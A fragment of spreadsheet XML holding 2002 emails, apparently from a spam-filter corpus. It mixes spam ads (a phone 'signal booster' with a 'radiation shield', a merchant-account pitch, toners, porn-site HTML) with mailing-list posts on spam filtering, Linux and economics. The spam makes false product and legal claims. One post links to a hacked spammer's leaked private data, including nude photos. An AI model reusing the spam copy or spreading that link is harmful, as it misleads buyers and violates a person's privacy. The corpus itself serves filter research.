 ------=_NextPart_519_80667744048
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;body&gt;
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;span style=3D"font-size: 22.0pt; color: =
 red"&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;&lt;span style=3D"font-size: 22.0pt"&gt;THE WORLDS MOST =
 ADVANCED&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;b&gt;
 &lt;span style=3D"font-size: 22.0pt; color: red"&gt;CELL PHONE SIGNAL =
 BOOSTER&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align: center"&gt;
 &lt;font color=3D"#0000FF"&gt;&lt;span style=3D"font-size: 22pt"&gt;&lt;b&gt;HANDS FREE HEADSET =
 KIT&lt;/b&gt;&lt;/span&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-size: 14.0pt"&gt;Super Signal =
 2002&lt;/span&gt;&lt;/b&gt;&lt;span style=3D"font-size: 14.0pt"&gt; 
 is the worlds most technologically advanced internal antenna booster, and 
 adapts to all makes and models of cell and mobile phones.&lt;/span&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center"&gt;&lt;span style=3D"font-size: 14.0pt"&gt;&amp;nbsp;As =
 seen on 
 TV for $19.99 each&lt;/span&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align: center"&gt;&lt;b&gt;
 &lt;span style=3D"font-size: 18.0pt"&gt;Now from &lt;span style=3D"color: blue"&gt;$2.=
 99&lt;/span&gt; 
 to &lt;span style=3D"color: blue"&gt;$7.99&lt;/span&gt; each!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align: center"&gt;&lt;b&gt;( &lt;/b&gt;price =
 based upon number of units purchased&lt;b&gt; )&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align: center"&gt;&lt;b&gt;
 &lt;span style=3D"font-size: 4.0pt"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=3D"font-size: 12.0pt; =
 color: red"&gt;BONUS&lt;/span&gt;&lt;span style=3D"font-size: 12.0pt"&gt;: 
 &amp;nbsp;FREE Radiation Shield with each antenna purchased!&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-size: 12.0pt"&gt;&amp;nbsp;&lt;/span&gt;&lt;span =
 style=3D"font-size: 14.0pt"&gt;Super 
 Signal 2002&lt;/span&gt;&lt;/b&gt;&lt;span style=3D"font-size: 14.0pt"&gt; utilizes the same 
 advanced aerospace technology used by state-of-the-art satellite dish =
 receivers, 
 which results in less dropped calls, less dead zones, and improved reception =
 in 
 buildings, elevators, hallways, tunnels, mountains, and any place where a =
 signal 
 is weak.&amp;nbsp; Dont miss that urgent call from your loved ones during an 
 emergency, natural disaster, or any critical situation.&amp;nbsp; &lt;b&gt;Get yours =
 now!&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-size: 14.0pt"&gt;&amp;nbsp;=
 &lt;/span&gt;&lt;/b&gt;&lt;font size=3D"6"&gt;&lt;u&gt;&lt;b&gt;&lt;i&gt;&lt;a href=3D"http://www.thezs.=
 com/0003/signal_booster.htm"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/i&gt;&lt;/b&gt;&lt;/u&gt;&lt;b&gt;&lt;a href=3D"http://www.thezs.com/0003"&gt; =
 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;
 &lt;font style=3D"font-size: 16pt"&gt;
 &lt;a href=3D"http://www.thezs.com/0003/signal_booster.htm"&gt;for more 
 information on this product and other products that improve cell phone 
 performance!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;
         &amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;
         &lt;font style=3D"font-size: 16pt"&gt;The Very Latest Technology =
 in&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FF0000" style=3D"font-size: 30pt"&gt;&lt;i&gt;Hands =
 Free Cell Phone 
 Communications&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;ul type=3D"square"&gt;
   &lt;li&gt;
   &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;b&gt;The World's Most Comfortable =
 Headset&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;
   &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;b&gt;The Clearest Two Way Sound Ever 
   Achieved&lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
   &lt;li&gt;
   &lt;p align=3D"center"&gt;&lt;font size=3D"4"&gt;&lt;b&gt;Reduce your risk of a phone-related 
   auto accident by 70%, soon to be required by law in most states!=
 &lt;/b&gt;&lt;/font&gt;&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"5" color=3D"#FF0000"&gt;&lt;b&gt;Now available for 50% to =
 80% 
 off retail price, as low as $8.99!&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal" align=3D"center" style=3D"text-align: center"&gt;&lt;b&gt;
 &lt;span style=3D"font-size: 4.0pt"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p class=3D"MsoNormal"&gt;&lt;b&gt;&lt;span style=3D"font-size: 12.0pt"&gt;&amp;nbsp;&lt;/span&gt;&lt;span =
 style=3D"font-size: 14.0pt"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;font size=3D"6"&gt;&lt;u&gt;&lt;a =
 href=3D"http://www.thezs.com/0003"&gt;&lt;b&gt;&lt;i&gt;CLICK HERE&lt;/i&gt;&lt;/b&gt;&lt;/a&gt;&lt;/u&gt;&lt;b&gt;&lt;a =
 href=3D"http://www.thezs.com/0003"&gt; &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;a href=3D"http://www.thezs.=
 com/0003"&gt;
 &lt;font style=3D"font-size: 16pt"&gt;for more 
 information on this product and other products that improve cell phone 
 performance!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"left"&gt;If you wish to unsubscribe from our opt-in mailing list, =
 please 
 click here: &lt;a href=3D"mailto:remove@nouce1.com"&gt;mailto:remove@nouce1.com&lt;/a&gt; =
 or 
 write us at: NOUCE1, 6822 22nd Ave. N., St. Petersburg, FL&amp;nbsp; =
 33710-3918&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_519_80667744048--
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Tue, 10 Sep 2002 15:43:32 BST,
 	James Gibbon &lt;james.gibbon@virgin.net&gt; wrote:
 &gt; 
 &gt; Tom Reingold wrote:
 &gt;
 &gt; &gt; Why?  What threat does Outlook pose to your organization?
 &gt; &gt; 
 &gt; 
 &gt; It has been described as "the technological equivalent of
 &gt; soliciting blood transfusions from random strangers in the
 &gt; street".  In short - it's a virus magnet.
 Oh, that.  Well, you're right.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Expand Your Business! [lzgsy]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Expand your business! Make it easy for your customers
 to pay using Visa, Master Card, Discover, American
 Express, Debit Card and Checks via Phone/Fax/Internet.
 How? Through a business Merchant Account!
 By providing multiple methods of acceptable payment
 you automatically help ensure that it will be easier
 for them to pay you and build up trust. People DON'T
 want to send cash or checks via mail, because it is
 dangerous and gives them absolutely no guarantees
 whatsoever.
 So make it easier for your customers and setup a
 Merchant Account for your business. There are NO setup
 fees, and the monthly costs are very low. To obtain
 more information, please reply to this email with 
 your name, phone number with area code, and a good
 time to call. You will be contacted within 10
 business days by one of our staff. Thank you for
 your time.
 To be removed from our contact list, send us an
 email with the subject "Remove"  and you will be
 automatically taken off our list. If removal does
 not work, reply with your email address in the Body
 of the email
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 6.25 30 yr fixed. No points, No Fees gdu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: US use of lie detector tests criticized
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8677924,1440/
 Date: Not supplied
 Government employees are routinely screened in a bid to spot spies - but the 
 testing is useless, says influential panel of scientists
</t>
  </si>
  <si>
    <t xml:space="preserve">It's a permissions issue on the razor log file.  SpamAssassin runs setuid 
 to the user to whom mail is being delivered.
 You'll need to make the razor log file world writable.
 On Mon, 9 Sep 2002, Rob wrote:
 &gt; I just set up razor and spamassassin, but I keep getting this error in my 
 &gt; mail log file
 &gt; 
 &gt; razor2 check skipped: No such file or directory Can't call method "log" on 
 &gt; unblessed reference at 
 &gt; /usr/local/lib/perl5/site_perl/5.8.0/Razor2/Client/Agent.pm line 212.
 &gt; 
 &gt; I have looked through the archived list and the only thing I have seen 
 &gt; about this error is a possible permission problem on the log file.
 &gt; I did what it said in the archives, basically change the permission on the 
 &gt; file but its still no go.
 &gt; 
 &gt; Any other help would be appreciated, maybe I'm missing something.
 &gt; something I forgot to run or do.
 &gt; 
 &gt; 
 &gt; rob
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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[Tim]
 &gt;&gt; I'd prefer to strip HTML tags from everything, but last time I tried
 &gt;&gt; that it still had bad effects on the error rates in my corpora
 [Guido]
 &gt; Your corpora are biased in this respect though -- newsgroups have a
 &gt; strong social taboo on posting HTML, but in many people's personal
 &gt; inboxes it is quite abundant.
 We're in violent agreement there:  the comments in tokenizer.py say that as
 strongly as possible, and I've repeated it endlessly here too.  But so long
 as I was the only one doing serious testing, it was a dubious idea to make
 the code maximally clumsy for me to use on the c.l.py task &lt;wink&gt;.
 &gt; Getting a good ham corpus may prove to be a bigger hurdle than I
 &gt; though!  My own saved mail doesn't reflect what I receive, since I
 &gt; save and throw away selectively (much more so than in the past :-).
 Yup, the system picks up on *everything* in the tokens.  Graham's proposed
 "delete as ham" and "delete as spam" keys would probably work very well for
 motivated geeks.  But Paul Svensson has pointed out here that they probably
 wouldn't work nearly so well for real people.
 &gt;&gt; Ah!  That explains why the HTML tags didn't get stripped.  I'd again
 &gt;&gt; offer to add an optional argument to tokenize() so that they'd get
 &gt;&gt; stripped here too, but if it gets glossed over a third time that
 &gt;&gt; would feel too much like a loss &lt;wink&gt;.
 &gt; I'll bite.  Sounds like a good idea to strip the HTML in this case;
 &gt; I'd like to see how this improves the f-p rate on this corpus.
 I'll soon check in this change:
     def tokenize_body(self, msg, retain_pure_html_tags=False):
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^
         """Generate a stream of tokens from an email Message.
         If a multipart/alternative section has both text/plain and text/html
         sections, the text/html section is ignored.  This may not be a good
         idea (e.g., the sections may have different content).
         HTML tags are always stripped from text/plain sections.
         By default, HTML tags are also stripped from text/html sections.
         However, doing so hurts the false negative rate on Tim's
         comp.lang.python tests (where HTML-only messages are almost never
         legitimate traffic).  If optional argument retain_pure_html_tags
         is specified and True, HTML tags are retained in text/html sections.
         """
 You should do a cvs up and establish a new baseline first, as I checked in a
 pure-win change in the wee hours that cut the fp and fn rates in my tests.
</t>
  </si>
  <si>
    <t xml:space="preserve">Oh, they were plenty upset about the tea taxes.
 But the crack down on colonial script certainly screwed over the
 American Colonies.  And, BTW, England as well.
 Dear Ben Franklin was right for the wrong reasons.  First of all the
 colonies were not prosperous compared to England proper.  Second, the
 issuance of colonial script had nothing to do with full employeement.
 (In fact, it is almost inconceivable he would make that claim.  It
 sounds like a modern Keynsian was creating an urban legend.)
 OTOH the lack of sufficient circulating monetary instruments was
 economically crippling.  Imagine trying to buy your supplies by offering
 IOUs on your own name -- and then trying to market / exchange the paper
 as the merchant who took the IOU.
 ===========================
 The most common problem in the world is when a government prints too
 much money.  The effects are a complete disaster.  There are a lot of
 incentives that push governments into doing this even though it is
 incredibly stupid.
 So almost all the literature talks about that.
 But you can ALSO screw an economy over by taking all the money out of
 circulation.  The fundamental cause of the American Great Depression was
 exactly this, courtesy of the Federal Reserve Board.
 I don't think shifting the power to print money to the bank of Canada
 had much effect.  And Canada is still a prosperous country.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Gary
 &gt; Lawrence Murphy
 &gt; Sent: Saturday, September 21, 2002 7:31 AM
 &gt; To: Mr. FoRK
 &gt; Cc: fork@example.com
 &gt; Subject: Re: sed /s/United States/Roman Empire/g
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; "f" == fork list &lt;Mr.&gt; writes:
 &gt; 
 &gt;     f&gt; "Free trade and free markets have proven their ability to lift
 &gt;     f&gt; whole societies out of poverty" I'm not a
 &gt;     f&gt; socio-political/history buff - does anybody have some clear
 &gt;     f&gt; examples?
 &gt; 
 &gt; China?  Ooops, no wait, scratch that.
 &gt; 
 &gt; There is one counter example that I can think of, but it may not be
 &gt; precisely "free trade/markets" -- when Ben Franklin first visited
 &gt; England he was asked why the colonies were so prosperous.  Ben
 &gt; explained that they used "Colonial Script", a kind of barter-dollar,
 &gt; and increasing the supply of script ensured complete employment.  The
 &gt; British bankers were furious and immediately lobbied parliament to
 &gt; clamp down on the practice.  Within a few years, the colonies were
 &gt; rife with unemployment and poverty just like the rest of the Empire.
 &gt; 
 &gt; According to questionable literature handed out by a fringe political
 &gt; party here in Canada, the Founding Fathers had no real complaint about
 &gt; tea taxes, it was the banning of colonial script they were
 &gt; protesting. If this is true, then it comes right back to the forces
 &gt; that killed Ned Ludd's followers as to why popular opinion believes
 &gt; they were protesting a tea tax.  The same pamphlet claimed that Canada
 &gt; was also a prosperous nation until, by an act of parliament in the
 &gt; late-50's or early 60's, the right to print money was removed from the
 &gt; juristiction of parliament and handed over to the Bank of Canada.
 &gt; 
 &gt; I've wondered about all this.  Certainly the timeline of the collapse
 &gt; of the Canadian economy fits the profile, but there are oodles of
 &gt; other causes (for example, spending money like we had 300M people when
 &gt; we only had 20M) Anyone have any further information on this?
 &gt; 
 &gt; --
 &gt; Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
 &gt;  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
 &gt;   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Toners and inkjet cartridges for less....          DTQAWN
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HR&gt;
 &lt;html&gt;
 &lt;div bgcolor=3D"#FFFFCC"&gt;
   &lt;p align=3D"center"&gt;&lt;img border=3D"0" src=3D"http://www.toners3.info/Ton=
 ers2GoLogo.jpg" width=3D"349" height=3D"96"&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Arial MT Black"&gt;&lt;i&gt;Tremendous=
  Savings&lt;/i&gt;
 on Toners,&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"6" face=3D"Arial MT Black"&gt;
 Inkjets, FAX, and Thermal Replenishables!!&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href=3D"http://www.toners3.info"&gt;Toners 2 Go &lt;/a&gt;is your secret
 weapon to lowering your cost for &lt;u&gt;High Quality, Low-Cost&lt;/u&gt; printer
 supplies!&amp;nbsp; We have been in the printer replenishables business since =
 1992,
 and pride ourselves on rapid response and outstanding customer service.&amp;nb=
 sp;
 What we sell are 100% compatible replacements for Epson, Canon, Hewlett Pa=
 ckard,
 Xerox, Okidata, Brother, and Lexmark; products that meet and often exceed
 original manufacturer's specifications.&lt;/p&gt;
 &lt;p&gt;&lt;i&gt;&lt;font size=3D"4"&gt;Check out these prices!&lt;/font&gt;&lt;/i&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Epson Stylus Color inkjet cartrid=
 ge
 (SO20108):&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Epson's Price: $27.99&amp;nbsp; &lt;font face=3D=
 "Arial MT Black"&gt;&amp;nbsp;&amp;nbsp;
 Toners2Go price: $9.95!&lt;/font&gt;&lt;/p&gt;
   &lt;p&gt;&amp;nbsp;&amp;nbsp; &lt;font face=3D"Arial MT Black"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;=
 HP
 LaserJet 4 Toner Cartridge
 (92298A):&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp=
 ; HP's
 Price: $88.99&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;=
 nbsp; &lt;font face=3D"Arial MT Black"&gt;Toners2Go
   price: $41.75!&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;Come visit us on the web to check out our hundreds of similar bargains =
 at &lt;a href=3D"http://www.toners3.info"&gt;Toners
 2 Go&lt;/a&gt;!
 &lt;/p&gt;
 &lt;hr&gt;
   &lt;p align=3D"center"&gt;&lt;font size=3D"1"&gt;&lt;strong&gt;Removal Instructions:&amp;nbsp;=
 &amp;nbsp; &lt;/strong&gt;&lt;/font&gt;&lt;font face=3D"Arial" color=3D"black" size=3D"1"&gt;&lt;sp=
 an style=3D"FONT-WEIGHT: bold; FONT-SIZE: 7.5pt; COLOR: black; FONT-FAMILY=
 : Arial"&gt;&lt;font face=3D"Arial"&gt;&lt;span style=3D"FONT-FAMILY: Arial"&gt;This
   message is sent in compliance of the new email bill section 301. Under B=
 ill
   S.1618 TITLE III passed by the 105th &lt;/span&gt;&lt;/font&gt;&lt;/span&gt;&lt;span style=3D=
 "FONT-SIZE: 7.5pt; COLOR: black; FONT-FAMILY: Arial"&gt;&lt;strong&gt;U.S.
   Congress. This message cannot be &lt;/strong&gt;&lt;/span&gt;&lt;span style=3D"FONT-WEI=
 GHT: bold; FONT-SIZE: 7.5pt; COLOR: black; FONT-FAMILY: Arial"&gt;&lt;font face=3D=
 "Arial"&gt;&lt;span style=3D"FONT-FAMILY: Arial"&gt;Considered
   Spam as long as we include the way to be removed and the senders info to=
  be
   true and not falsefied. Paragraph (a)(c) of S.1618, further transmission=
 s to
   you by the sender of this email may be stopped at no cost to you by send=
 ing a
   request to be removed by clicking &lt;a href=3D"http://www.toners3.info/uns=
 ubscribe.htm"&gt;HERE&lt;/a&gt;&lt;/span&gt;&lt;/font&gt;&lt;br&gt;
   We honor all remove requests at immediately.&lt;/span&gt;&lt;/font&gt;&lt;span style=3D=
 "FONT-SIZE: 7.5pt; COLOR: black; FONT-FAMILY: Arial"&gt;
   PLEASE FORGIVE ANY UNWANTED INTRUSION.&lt;/span&gt;
 &lt;/div&gt;
 &lt;/html&gt;
 shirlean
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Jul 30, 2002 at 03:47:40PM +0100, Niall O Broin wrote:
 &gt; I'm installing warm standby disks on a number of boxes. These disks will be
 &gt; the same size (sometimes bigger) than the main disk. The idea is that every
 &gt; night I'll rsync the partitions on the main disk to the standby disk so that
 &gt; in the case of disaster, the first port of call, before the tapes, is the
 &gt; standby disk. (We did consider running Linux md RAID on the disks but RAID
 &gt; gives you no protection against slips of the finger)
 actually, on a related note, has anyone tried snapfs ?
 &gt; Unfortunately suck and it and see is rather tricky - the machines concerned
 &gt; are not to hand.
 just keep root as hda, you can change boot all you want, that's
 where it will get written when you run lilo from the prompt.
 just have a sane lilo.conf (with root=/dev/hda) and use lilo -b
 to write to different devices.
 -- 
 colmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  
 Web:                                 http://devnull.redbrick.dcu.ie/ 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Wednesday, August 28, 2002, at 04:38  PM, Daniel Quinlan wrote:
 &gt; Just a few notes:
 &gt;
 &gt;  - It will be difficult to find, prosecute, and win money from someone
 &gt;    in various non-friendly countries where spam originates (China is a
 &gt;    good example) even if they do officially "respect" copyright law.
 A lot of spam which *appears* to originate from China, and even 
 a lot which advertises websites hosted there, is sent by, and is 
 done for the benefit of, companies based in the US.  The spam 
 often appears to originate there because it's coming from open 
 http, or squid proxy servers.  It's hosted there because these 
 spammers are now persona-non-grata on all US ISPs.  One hardly 
 needs to involve the Chinese government in a case where a US 
 citizen is violating US law.
 &gt;  - Law suits take time. Between now and conclusion of the first court
 &gt;    case, we could have years of spam in our mail boxes!
 The first court cases were actually concluded years ago. These 
 include many legal precedents which are used to protect the 
 rights of ISPs to block mail, and to terminate service to 
 spammers.
 &gt;  - Contact information can change: phone numbers, PO boxes, stolen
 &gt;    cell phones, temporary email addresses, etc.
 Surprising then, how much information you can find on the 
 current whereabouts of long-time spammers like Alan Ralksy of 
 Detroit, Michigan.  Ralsky is a guy who even gives interviews to 
 the news media.  If you can connect a specific corpus of spam to 
 him, his street address is well known. Ralsky is a prime 
 candidate for lawsuits in any state with an anti-spam law. 
 Thomas Cowles is another long-time spammer, but last I heard 
 he'd been jailed for stealing computer equipment from his 
 business partner, Eddy Marin (also a long time spammer (You've 
 heard of PopLaunch, right?)
 &gt;  - Spammers do not always remember to include contact information!  I
 &gt;    don't understand it either, but nobody said they were bright.  Also,
 &gt;    some spam is non-commercial or sent by a third-party (for example,
 &gt;    "pump and dump" stock scams), so contact information is not strictly
 &gt;    required for the spammer to get their way.
 Back when I was working at MAPS, there was a flap over a 
 pump-and-dump spammer, Rodona Garst.  Seems she had an open 
 file-share on her laptop, and when she forged the wrong domain, 
 the real owner hacked in and posted all her private information 
 on a website. Oh, look, it's still there, including the nude 
 photos:
 http://belps.freewebsites.com/
 I recall this well, because the SEC was VERY interested in 
 confirming the validity of the information found online.  There 
 were some "interesting" conversations. This summer, the SEC 
 released the following:
 http://www.sec.gov/litigation/admin/33-8113.htm
 Yes, the investigation took two years, but the financial penalty 
 for operating a pump-and-dump scam isn't small.  The wheels of 
 government grind slow, but the grind very fine indeed.
 --B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</si>
  <si>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Huge natural tits
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Big and big&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type
 content="text/html; charset=windows-1252"&gt;&lt;HTTP-EQUIV="PRAGMA"
 CONTENT="NO-CACHE"&gt;
 &lt;META content="MSHTML 6.00.2716.2200" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY text=#eaebec vLink=#ffffcc aLink=#ffffff link=#ffffcc bgColor=#647481
 leftMargin=0 background="http://www.jeweldive.com:81/nsi/big/bg.jpg"
 topMargin=0&gt;
 &lt;CENTER&gt;
   &lt;CENTER&gt;
     &lt;CENTER&gt;
       &lt;FONT face=verdana&gt;&lt;BR&gt;
       &lt;/FONT&gt;
       &lt;CENTER&gt;
         &lt;TABLE cellPadding=15 bgColor=wheat&gt;
           &lt;TBODY&gt;
           &lt;TR&gt;
             &lt;TD&gt;
               &lt;CENTER&gt;
                 &lt;font color="maroon" face="verdana"&gt;&lt;A
       onmouseover="window.status='BIGbigS - Nothing but horny amateurs with huge big tits!';return true"
       href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;IMG
       src="http://www.jeweldive.com:81/nsi/big/2.jpg" border=0&gt;&lt;/A&gt;&lt;BR&gt;
                 &lt;/font&gt;&lt;FONT color=maroon&gt;
                 &lt;TABLE cellSpacing=24&gt;
                   &lt;TBODY&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-009.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-007.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-054.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-083.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-150.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-109.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-090.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-170.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-079.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-188.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-119.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
             color=red&gt;&lt;IMG
             src="http://www.jeweldive.com:81/nsi/big/tracy-192.jpg" border="0"&gt;&lt;/font&gt;&lt;/A&gt;&lt;/font&gt;&lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;TR&gt;
                     &lt;TD&gt;&lt;font face="verdana"&gt;&lt;A
             href="http://www.jeweldive.com:81/nsi/big/natural/bindex.htm"&gt;&lt;FONT
